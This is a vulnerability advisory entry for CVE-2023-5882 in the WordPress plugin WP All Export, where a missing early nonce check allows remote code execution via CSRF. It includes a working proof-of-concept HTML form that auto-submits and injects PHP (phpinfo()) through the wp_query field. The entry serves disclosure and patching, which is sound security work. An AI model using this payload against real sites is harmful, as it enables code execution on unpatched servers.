Lucene search
Unlock SecurityWPEX-ID:72BE4B5C-21BE-46AF-A3F4-08B4C190A7E2HistoryNov 21, 2023 - 12:00 a.m.
WP All Export (Free < 1.4.1, Pro < 1.8.6) - Remote Code Execution via CSRF
2023-11-2100:00:00
Unlock Security
58
wp all export
remote code execution
csrf
super admin
phpinfo
form submission
Description The plugin does not check nonce tokens early enough in the request lifecycle, allowing attackers to make logged in users perform unwanted actions leading to remote code execution.
Submit the following form as a Super Admin (notice that it does not contain a nonce). Despite the error, visit `/wp-admin/admin.php?page=pmxe-admin-export&action=template` to see the output of `phpinfo()`.
<html>
<body>
<form action="https://wpscan-vulnerability-test-bench.ddev.site/wp-admin/admin.php?page=pmxe-admin-export" method="POST">
<input type="hidden" name="export_type" value="advanced" />
<input type="hidden" name="wp_query_selector" value="wp_query" />
<input type="hidden" name="wp_query" value="phpinfo()" />
<input type="hidden" name="is_submitted" value="1" />
<input type="hidden" name="auto_generate" value="0" />
<input type="hidden" name="_wp_http_referer" value="/wp-admin/admin.php?page=pmxe-admin-export" />
<input type="submit" value="Submit request" />
</form>
<script>document.getElementsByTagName('form')[0].submit()</script>
</body>
</html>Related
prion
prion
Remote code execution
2023-12-18 20:15:00
cvelist
cvelist
cve
cve
CVE-2023-5882
2023-12-18 20:15:08
wpvulndb
wpvulndb
WP All Export (Free < 1.4.1, Pro < 1.8.6) - Remote Code Execution via CSRF
2023-11-21 00:00:00
nvd
nvd
CVE-2023-5882
2023-12-18 20:15:08
wordfence
wordfence
AI Score
9.7
Confidence
High
EPSS
0.001
Percentile
49.2%
Related for WPEX-ID:72BE4B5C-21BE-46AF-A3F4-08B4C190A7E2